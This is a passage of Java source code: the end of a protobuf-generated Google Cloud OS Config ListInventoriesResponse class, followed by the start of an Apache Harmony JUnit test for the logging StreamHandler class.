com.google.cloud.osconfig.v1.Inventories .internal_static_google_cloud_osconfig_v1_ListInventoriesResponse_descriptor; } @java.lang.Override public com.google.cloud.osconfig.v1.ListInventoriesResponse getDefaultInstanceForType() { return com.google.cloud.osconfig.v1.ListInventoriesResponse.getDefaultInstance(); } @java.lang.Override public com.google.cloud.osconfig.v1.ListInventoriesResponse build() { com.google.cloud.osconfig.v1.ListInventoriesResponse result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.osconfig.v1.ListInventoriesResponse buildPartial() { com.google.cloud.osconfig.v1.ListInventoriesResponse result = new com.google.cloud.osconfig.v1.ListInventoriesResponse(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.cloud.osconfig.v1.ListInventoriesResponse result) { if (inventoriesBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0)) { inventories_ = java.util.Collections.unmodifiableList(inventories_); bitField0_ = (bitField0_ & ~0x00000001); } result.inventories_ = inventories_; } else { result.inventories_ = inventoriesBuilder_.build(); } } private void buildPartial0(com.google.cloud.osconfig.v1.ListInventoriesResponse result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000002) != 0)) { result.nextPageToken_ = nextPageToken_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { 
return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.osconfig.v1.ListInventoriesResponse) { return mergeFrom((com.google.cloud.osconfig.v1.ListInventoriesResponse) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.osconfig.v1.ListInventoriesResponse other) { if (other == com.google.cloud.osconfig.v1.ListInventoriesResponse.getDefaultInstance()) return this; if (inventoriesBuilder_ == null) { if (!other.inventories_.isEmpty()) { if (inventories_.isEmpty()) { inventories_ = other.inventories_; bitField0_ = (bitField0_ & ~0x00000001); } else { ensureInventoriesIsMutable(); inventories_.addAll(other.inventories_); } onChanged(); } } else { if (!other.inventories_.isEmpty()) { if (inventoriesBuilder_.isEmpty()) { inventoriesBuilder_.dispose(); inventoriesBuilder_ = null; inventories_ = other.inventories_; bitField0_ = (bitField0_ & ~0x00000001); inventoriesBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? 
getInventoriesFieldBuilder() : null; } else { inventoriesBuilder_.addAllMessages(other.inventories_); } } } if (!other.getNextPageToken().isEmpty()) { nextPageToken_ = other.nextPageToken_; bitField0_ |= 0x00000002; onChanged(); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { com.google.cloud.osconfig.v1.Inventory m = input.readMessage( com.google.cloud.osconfig.v1.Inventory.parser(), extensionRegistry); if (inventoriesBuilder_ == null) { ensureInventoriesIsMutable(); inventories_.add(m); } else { inventoriesBuilder_.addMessage(m); } break; } // case 10 case 18: { nextPageToken_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.util.List<com.google.cloud.osconfig.v1.Inventory> inventories_ = java.util.Collections.emptyList(); private void ensureInventoriesIsMutable() { if (!((bitField0_ & 0x00000001) != 0)) { inventories_ = new java.util.ArrayList<com.google.cloud.osconfig.v1.Inventory>(inventories_); bitField0_ |= 0x00000001; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.osconfig.v1.Inventory, com.google.cloud.osconfig.v1.Inventory.Builder, 
com.google.cloud.osconfig.v1.InventoryOrBuilder> inventoriesBuilder_; /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public java.util.List<com.google.cloud.osconfig.v1.Inventory> getInventoriesList() { if (inventoriesBuilder_ == null) { return java.util.Collections.unmodifiableList(inventories_); } else { return inventoriesBuilder_.getMessageList(); } } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public int getInventoriesCount() { if (inventoriesBuilder_ == null) { return inventories_.size(); } else { return inventoriesBuilder_.getCount(); } } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public com.google.cloud.osconfig.v1.Inventory getInventories(int index) { if (inventoriesBuilder_ == null) { return inventories_.get(index); } else { return inventoriesBuilder_.getMessage(index); } } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public Builder setInventories(int index, com.google.cloud.osconfig.v1.Inventory value) { if (inventoriesBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureInventoriesIsMutable(); inventories_.set(index, value); onChanged(); } else { inventoriesBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * List of inventory objects. 
* </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public Builder setInventories( int index, com.google.cloud.osconfig.v1.Inventory.Builder builderForValue) { if (inventoriesBuilder_ == null) { ensureInventoriesIsMutable(); inventories_.set(index, builderForValue.build()); onChanged(); } else { inventoriesBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public Builder addInventories(com.google.cloud.osconfig.v1.Inventory value) { if (inventoriesBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureInventoriesIsMutable(); inventories_.add(value); onChanged(); } else { inventoriesBuilder_.addMessage(value); } return this; } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public Builder addInventories(int index, com.google.cloud.osconfig.v1.Inventory value) { if (inventoriesBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureInventoriesIsMutable(); inventories_.add(index, value); onChanged(); } else { inventoriesBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public Builder addInventories(com.google.cloud.osconfig.v1.Inventory.Builder builderForValue) { if (inventoriesBuilder_ == null) { ensureInventoriesIsMutable(); inventories_.add(builderForValue.build()); onChanged(); } else { inventoriesBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * List of inventory objects. 
* </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public Builder addInventories( int index, com.google.cloud.osconfig.v1.Inventory.Builder builderForValue) { if (inventoriesBuilder_ == null) { ensureInventoriesIsMutable(); inventories_.add(index, builderForValue.build()); onChanged(); } else { inventoriesBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public Builder addAllInventories( java.lang.Iterable<? extends com.google.cloud.osconfig.v1.Inventory> values) { if (inventoriesBuilder_ == null) { ensureInventoriesIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, inventories_); onChanged(); } else { inventoriesBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public Builder clearInventories() { if (inventoriesBuilder_ == null) { inventories_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); } else { inventoriesBuilder_.clear(); } return this; } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public Builder removeInventories(int index) { if (inventoriesBuilder_ == null) { ensureInventoriesIsMutable(); inventories_.remove(index); onChanged(); } else { inventoriesBuilder_.remove(index); } return this; } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public com.google.cloud.osconfig.v1.Inventory.Builder getInventoriesBuilder(int index) { return getInventoriesFieldBuilder().getBuilder(index); } /** * * * <pre> * List of inventory objects. 
* </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public com.google.cloud.osconfig.v1.InventoryOrBuilder getInventoriesOrBuilder(int index) { if (inventoriesBuilder_ == null) { return inventories_.get(index); } else { return inventoriesBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public java.util.List<? extends com.google.cloud.osconfig.v1.InventoryOrBuilder> getInventoriesOrBuilderList() { if (inventoriesBuilder_ != null) { return inventoriesBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(inventories_); } } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public com.google.cloud.osconfig.v1.Inventory.Builder addInventoriesBuilder() { return getInventoriesFieldBuilder() .addBuilder(com.google.cloud.osconfig.v1.Inventory.getDefaultInstance()); } /** * * * <pre> * List of inventory objects. * </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public com.google.cloud.osconfig.v1.Inventory.Builder addInventoriesBuilder(int index) { return getInventoriesFieldBuilder() .addBuilder(index, com.google.cloud.osconfig.v1.Inventory.getDefaultInstance()); } /** * * * <pre> * List of inventory objects. 
* </pre> * * <code>repeated .google.cloud.osconfig.v1.Inventory inventories = 1;</code> */ public java.util.List<com.google.cloud.osconfig.v1.Inventory.Builder> getInventoriesBuilderList() { return getInventoriesFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.osconfig.v1.Inventory, com.google.cloud.osconfig.v1.Inventory.Builder, com.google.cloud.osconfig.v1.InventoryOrBuilder> getInventoriesFieldBuilder() { if (inventoriesBuilder_ == null) { inventoriesBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.osconfig.v1.Inventory, com.google.cloud.osconfig.v1.Inventory.Builder, com.google.cloud.osconfig.v1.InventoryOrBuilder>( inventories_, ((bitField0_ & 0x00000001) != 0), getParentForChildren(), isClean()); inventories_ = null; } return inventoriesBuilder_; } private java.lang.Object nextPageToken_ = ""; /** * * * <pre> * The pagination token to retrieve the next page of inventory objects. * </pre> * * <code>string next_page_token = 2;</code> * * @return The nextPageToken. */ public java.lang.String getNextPageToken() { java.lang.Object ref = nextPageToken_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); nextPageToken_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * The pagination token to retrieve the next page of inventory objects. * </pre> * * <code>string next_page_token = 2;</code> * * @return The bytes for nextPageToken. */ public com.google.protobuf.ByteString getNextPageTokenBytes() { java.lang.Object ref = nextPageToken_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); nextPageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * The pagination token to retrieve the next page of inventory objects. 
* </pre> * * <code>string next_page_token = 2;</code> * * @param value The nextPageToken to set. * @return This builder for chaining. */ public Builder setNextPageToken(java.lang.String value) { if (value == null) { throw new NullPointerException(); } nextPageToken_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * The pagination token to retrieve the next page of inventory objects. * </pre> * * <code>string next_page_token = 2;</code> * * @return This builder for chaining. */ public Builder clearNextPageToken() { nextPageToken_ = getDefaultInstance().getNextPageToken(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * The pagination token to retrieve the next page of inventory objects. * </pre> * * <code>string next_page_token = 2;</code> * * @param value The bytes for nextPageToken to set. * @return This builder for chaining. */ public Builder setNextPageTokenBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); nextPageToken_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.osconfig.v1.ListInventoriesResponse) } // @@protoc_insertion_point(class_scope:google.cloud.osconfig.v1.ListInventoriesResponse) private static final com.google.cloud.osconfig.v1.ListInventoriesResponse DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.osconfig.v1.ListInventoriesResponse(); } public static com.google.cloud.osconfig.v1.ListInventoriesResponse getDefaultInstance() { return DEFAULT_INSTANCE; } private static final 
com.google.protobuf.Parser<ListInventoriesResponse> PARSER = new com.google.protobuf.AbstractParser<ListInventoriesResponse>() { @java.lang.Override public ListInventoriesResponse parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<ListInventoriesResponse> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<ListInventoriesResponse> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.osconfig.v1.ListInventoriesResponse getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/harmony
33,668
classlib/modules/logging/src/test/java/org/apache/harmony/logging/tests/java/util/logging/StreamHandlerTest.java
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.harmony.logging.tests.java.util.logging; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.OutputStream; import java.io.PrintStream; import java.io.UnsupportedEncodingException; import java.nio.CharBuffer; import java.nio.charset.Charset; import java.nio.charset.CharsetEncoder; import java.nio.charset.CodingErrorAction; import java.security.Permission; import java.util.Arrays; import java.util.Properties; import java.util.logging.Filter; import java.util.logging.Formatter; import java.util.logging.Handler; import java.util.logging.Level; import java.util.logging.LogManager; import java.util.logging.LogRecord; import java.util.logging.LoggingPermission; import java.util.logging.SimpleFormatter; import java.util.logging.StreamHandler; import junit.framework.TestCase; import org.apache.harmony.logging.tests.java.util.logging.HandlerTest.NullOutputStream; import org.apache.harmony.logging.tests.java.util.logging.util.EnvironmentHelper; import tests.util.CallVerificationStack; /** * Test the class StreamHandler. 
*/ public class StreamHandlerTest extends TestCase { private final static String INVALID_LEVEL = "impossible_level"; private final PrintStream err = System.err; private OutputStream errSubstituteStream = null; private static String className = StreamHandlerTest.class.getName(); private static CharsetEncoder encoder; static { encoder = Charset.forName("iso-8859-1").newEncoder(); encoder.onMalformedInput(CodingErrorAction.REPLACE); encoder.onUnmappableCharacter(CodingErrorAction.REPLACE); } /* * @see TestCase#setUp() */ protected void setUp() throws Exception { super.setUp(); errSubstituteStream = new NullOutputStream(); System.setErr(new PrintStream(errSubstituteStream)); } /* * @see TestCase#tearDown() */ protected void tearDown() throws Exception { LogManager.getLogManager().reset(); CallVerificationStack.getInstance().clear(); System.setErr(err); super.tearDown(); } /* * Test the constructor with no parameter, and no relevant log manager * properties are set. */ public void testConstructor_NoParameter_NoProperties() { assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.level")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.filter")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.formatter")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.encoding")); StreamHandler h = new StreamHandler(); assertSame(Level.INFO, h.getLevel()); assertTrue(h.getFormatter() instanceof SimpleFormatter); assertNull(h.getFilter()); assertNull(h.getEncoding()); } /* * Test the constructor with insufficient privilege. 
*/ public void testConstructor_NoParameter_InsufficientPrivilege() { assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.level")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.filter")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.formatter")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.encoding")); SecurityManager oldMan = System.getSecurityManager(); System.setSecurityManager(new MockSecurityManager()); // set a normal value try { StreamHandler h = new StreamHandler(); assertSame(Level.INFO, h.getLevel()); assertTrue(h.getFormatter() instanceof SimpleFormatter); assertNull(h.getFilter()); assertNull(h.getEncoding()); } finally { System.setSecurityManager(oldMan); } } /* * Test the constructor with no parameter, and valid relevant log manager * properties are set. */ public void testConstructor_NoParameter_ValidProperties() throws Exception { Properties p = new Properties(); p.put("java.util.logging.StreamHandler.level", "FINE"); p.put("java.util.logging.StreamHandler.filter", className + "$MockFilter"); p.put("java.util.logging.StreamHandler.formatter", className + "$MockFormatter"); p.put("java.util.logging.StreamHandler.encoding", "iso-8859-1"); LogManager.getLogManager().readConfiguration( EnvironmentHelper.PropertiesToInputStream(p)); assertEquals("FINE", LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.level")); assertEquals("iso-8859-1", LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.encoding")); StreamHandler h = new StreamHandler(); assertSame(h.getLevel(), Level.parse("FINE")); assertTrue(h.getFormatter() instanceof MockFormatter); assertTrue(h.getFilter() instanceof MockFilter); assertEquals("iso-8859-1", h.getEncoding()); } /* * Test the constructor with no parameter, and invalid relevant log manager * properties are set. 
*/ public void testConstructor_NoParameter_InvalidProperties() throws Exception { Properties p = new Properties(); p.put("java.util.logging.StreamHandler.level", INVALID_LEVEL); p.put("java.util.logging.StreamHandler.filter", className + ""); p.put("java.util.logging.StreamHandler.formatter", className + ""); p.put("java.util.logging.StreamHandler.encoding", "XXXX"); LogManager.getLogManager().readConfiguration( EnvironmentHelper.PropertiesToInputStream(p)); assertEquals(INVALID_LEVEL, LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.level")); assertEquals("XXXX", LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.encoding")); StreamHandler h = new StreamHandler(); assertSame(Level.INFO, h.getLevel()); assertTrue(h.getFormatter() instanceof SimpleFormatter); assertNull(h.getFilter()); assertNull(h.getEncoding()); h.publish(new LogRecord(Level.SEVERE, "test")); assertTrue(CallVerificationStack.getInstance().empty()); assertNull(h.getEncoding()); } /* * Test the constructor with normal parameter values, and no relevant log * manager properties are set. */ public void testConstructor_HasParameters_NoProperties() { assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.level")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.filter")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.formatter")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.encoding")); StreamHandler h = new StreamHandler(new ByteArrayOutputStream(), new MockFormatter2()); assertSame(Level.INFO, h.getLevel()); assertTrue(h.getFormatter() instanceof MockFormatter2); assertNull(h.getFilter()); assertNull(h.getEncoding()); } /* * Test the constructor with insufficient privilege. 
*/ public void testConstructor_HasParameter_InsufficientPrivilege() { assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.level")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.filter")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.formatter")); assertNull(LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.encoding")); SecurityManager oldMan = System.getSecurityManager(); System.setSecurityManager(new MockSecurityManager()); // set a normal value try { StreamHandler h = new StreamHandler(new ByteArrayOutputStream(), new MockFormatter2()); assertSame(Level.INFO, h.getLevel()); assertTrue(h.getFormatter() instanceof MockFormatter2); assertNull(h.getFilter()); assertNull(h.getEncoding()); } finally { System.setSecurityManager(oldMan); } } /* * Test the constructor with normal parameter values, and valid relevant log * manager properties are set. */ public void testConstructor_HasParameters_ValidProperties() throws Exception { Properties p = new Properties(); p.put("java.util.logging.StreamHandler.level", "FINE"); p.put("java.util.logging.StreamHandler.filter", className + "$MockFilter"); p.put("java.util.logging.StreamHandler.formatter", className + "$MockFormatter"); p.put("java.util.logging.StreamHandler.encoding", "iso-8859-1"); LogManager.getLogManager().readConfiguration( EnvironmentHelper.PropertiesToInputStream(p)); assertEquals("FINE", LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.level")); assertEquals("iso-8859-1", LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.encoding")); StreamHandler h = new StreamHandler(new ByteArrayOutputStream(), new MockFormatter2()); assertSame(h.getLevel(), Level.parse("FINE")); assertTrue(h.getFormatter() instanceof MockFormatter2); assertTrue(h.getFilter() instanceof MockFilter); assertEquals("iso-8859-1", h.getEncoding()); } /* * Test the 
constructor with normal parameter, and invalid relevant log * manager properties are set. */ public void testConstructor_HasParameters_InvalidProperties() throws Exception { Properties p = new Properties(); p.put("java.util.logging.StreamHandler.level", INVALID_LEVEL); p.put("java.util.logging.StreamHandler.filter", className + ""); p.put("java.util.logging.StreamHandler.formatter", className + ""); p.put("java.util.logging.StreamHandler.encoding", "XXXX"); LogManager.getLogManager().readConfiguration( EnvironmentHelper.PropertiesToInputStream(p)); assertEquals(INVALID_LEVEL, LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.level")); assertEquals("XXXX", LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.encoding")); StreamHandler h = new StreamHandler(new ByteArrayOutputStream(), new MockFormatter2()); assertSame(Level.INFO, h.getLevel()); assertTrue(h.getFormatter() instanceof MockFormatter2); assertNull(h.getFilter()); assertNull(h.getEncoding()); } /* * Test the constructor with null formatter, and invalid relevant log manager * properties are set. 
*/ public void testConstructor_HasParameters_ValidPropertiesNullStream() throws Exception { Properties p = new Properties(); p.put("java.util.logging.StreamHandler.level", "FINE"); p.put("java.util.logging.StreamHandler.filter", className + "$MockFilter"); p.put("java.util.logging.StreamHandler.formatter", className + "$MockFormatter"); p.put("java.util.logging.StreamHandler.encoding", "iso-8859-1"); LogManager.getLogManager().readConfiguration( EnvironmentHelper.PropertiesToInputStream(p)); assertEquals("FINE", LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.level")); assertEquals("iso-8859-1", LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.encoding")); try { new StreamHandler(new ByteArrayOutputStream(), null); fail("Should throw NullPointerException!"); } catch (NullPointerException e) { // expected } } /* * Test the constructor with null output stream, and invalid relevant log * manager properties are set. */ public void testConstructor_HasParameters_ValidPropertiesNullFormatter() throws Exception { Properties p = new Properties(); p.put("java.util.logging.StreamHandler.level", "FINE"); p.put("java.util.logging.StreamHandler.filter", className + "$MockFilter"); p.put("java.util.logging.StreamHandler.formatter", className + "$MockFormatter"); p.put("java.util.logging.StreamHandler.encoding", "iso-8859-1"); LogManager.getLogManager().readConfiguration( EnvironmentHelper.PropertiesToInputStream(p)); assertEquals("FINE", LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.level")); assertEquals("iso-8859-1", LogManager.getLogManager().getProperty( "java.util.logging.StreamHandler.encoding")); try { new StreamHandler(null, new MockFormatter2()); fail("Should throw NullPointerException!"); } catch (NullPointerException e) { // expected } } /* * Test close() when having sufficient privilege, and a record has been * written to the output stream. 
*/ public void testClose_SufficientPrivilege_NormalClose() { ByteArrayOutputStream aos = new MockOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); h.publish(new LogRecord(Level.SEVERE, "testClose_SufficientPrivilege_NormalClose msg")); h.close(); assertEquals("close", CallVerificationStack.getInstance() .getCurrentSourceMethod()); assertNull(CallVerificationStack.getInstance().pop()); assertEquals("flush", CallVerificationStack.getInstance() .getCurrentSourceMethod()); CallVerificationStack.getInstance().clear(); assertTrue(aos.toString().endsWith("MockFormatter_Tail")); h.close(); } /* * Test close() when having sufficient privilege, and an output stream that * always throws exceptions. */ public void testClose_SufficientPrivilege_Exception() { ByteArrayOutputStream aos = new MockExceptionOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); h.publish(new LogRecord(Level.SEVERE, "testClose_SufficientPrivilege_Exception msg")); h.flush(); h.close(); } /* * Test close() when having sufficient privilege, and no record has been * written to the output stream. */ public void testClose_SufficientPrivilege_DirectClose() { ByteArrayOutputStream aos = new MockOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); h.close(); assertEquals("close", CallVerificationStack.getInstance() .getCurrentSourceMethod()); assertNull(CallVerificationStack.getInstance().pop()); assertEquals("flush", CallVerificationStack.getInstance() .getCurrentSourceMethod()); CallVerificationStack.getInstance().clear(); assertEquals("MockFormatter_HeadMockFormatter_Tail", aos.toString() ); } /* * Test close() when having insufficient privilege. 
*/ public void testClose_InsufficientPrivilege() { SecurityManager oldMan = System.getSecurityManager(); System.setSecurityManager(new MockSecurityManager()); try { StreamHandler h = new StreamHandler(new ByteArrayOutputStream(), new MockFormatter()); h.close(); fail("Should throw SecurityException!"); } catch (SecurityException e) { // expected } finally { System.setSecurityManager(oldMan); } } /* * Test close() when having no output stream. */ public void testClose_NoOutputStream() { StreamHandler h = new StreamHandler(); h.close(); } /* * Test flush(). */ public void testFlush_Normal() { ByteArrayOutputStream aos = new MockOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); h.flush(); assertEquals("flush", CallVerificationStack.getInstance() .getCurrentSourceMethod()); assertNull(CallVerificationStack.getInstance().pop()); CallVerificationStack.getInstance().clear(); } /* * Test flush() when having no output stream. */ public void testFlush_NoOutputStream() { StreamHandler h = new StreamHandler(); h.flush(); } /* * Test isLoggable(), use no filter, having output stream */ public void testIsLoggable_NoOutputStream() { StreamHandler h = new StreamHandler(); LogRecord r = new LogRecord(Level.INFO, null); assertFalse(h.isLoggable(r)); h.setLevel(Level.WARNING); assertFalse(h.isLoggable(r)); h.setLevel(Level.CONFIG); assertFalse(h.isLoggable(r)); r.setLevel(Level.OFF); h.setLevel(Level.OFF); assertFalse(h.isLoggable(r)); } /* * Test isLoggable(), use no filter, having output stream */ public void testIsLoggable_NoFilter() { StreamHandler h = new StreamHandler(new ByteArrayOutputStream(), new SimpleFormatter()); LogRecord r = new LogRecord(Level.INFO, null); assertTrue(h.isLoggable(r)); h.setLevel(Level.WARNING); assertFalse(h.isLoggable(r)); h.setLevel(Level.CONFIG); assertTrue(h.isLoggable(r)); r.setLevel(Level.OFF); h.setLevel(Level.OFF); assertFalse(h.isLoggable(r)); } /* * Test isLoggable(), use a filter, having output stream */ public 
void testIsLoggable_WithFilter() { StreamHandler h = new StreamHandler(new ByteArrayOutputStream(), new SimpleFormatter()); LogRecord r = new LogRecord(Level.INFO, null); h.setFilter(new MockFilter()); assertFalse(h.isLoggable(r)); assertSame(r, CallVerificationStack.getInstance().pop()); h.setLevel(Level.CONFIG); assertFalse(h.isLoggable(r)); assertSame(r, CallVerificationStack.getInstance().pop()); h.setLevel(Level.WARNING); assertFalse(h.isLoggable(r)); assertTrue(CallVerificationStack.getInstance().empty()); } /* * Test isLoggable(), null log record, having output stream. Handler should * call ErrorManager to handle exceptional case */ public void testIsLoggable_Null() { StreamHandler h = new StreamHandler(new ByteArrayOutputStream(), new SimpleFormatter()); assertFalse(h.isLoggable(null)); } /* * Test isLoggable(), null log record, without output stream */ public void testIsLoggable_Null_NoOutputStream() { StreamHandler h = new StreamHandler(); assertFalse(h.isLoggable(null)); } /* * Test publish(), use no filter, having output stream, normal log record. */ public void testPublish_NoOutputStream() { StreamHandler h = new StreamHandler(); LogRecord r = new LogRecord(Level.INFO, "testPublish_NoOutputStream"); h.publish(r); h.setLevel(Level.WARNING); h.publish(r); h.setLevel(Level.CONFIG); h.publish(r); r.setLevel(Level.OFF); h.setLevel(Level.OFF); h.publish(r); } /* * Test publish(), use no filter, having output stream, 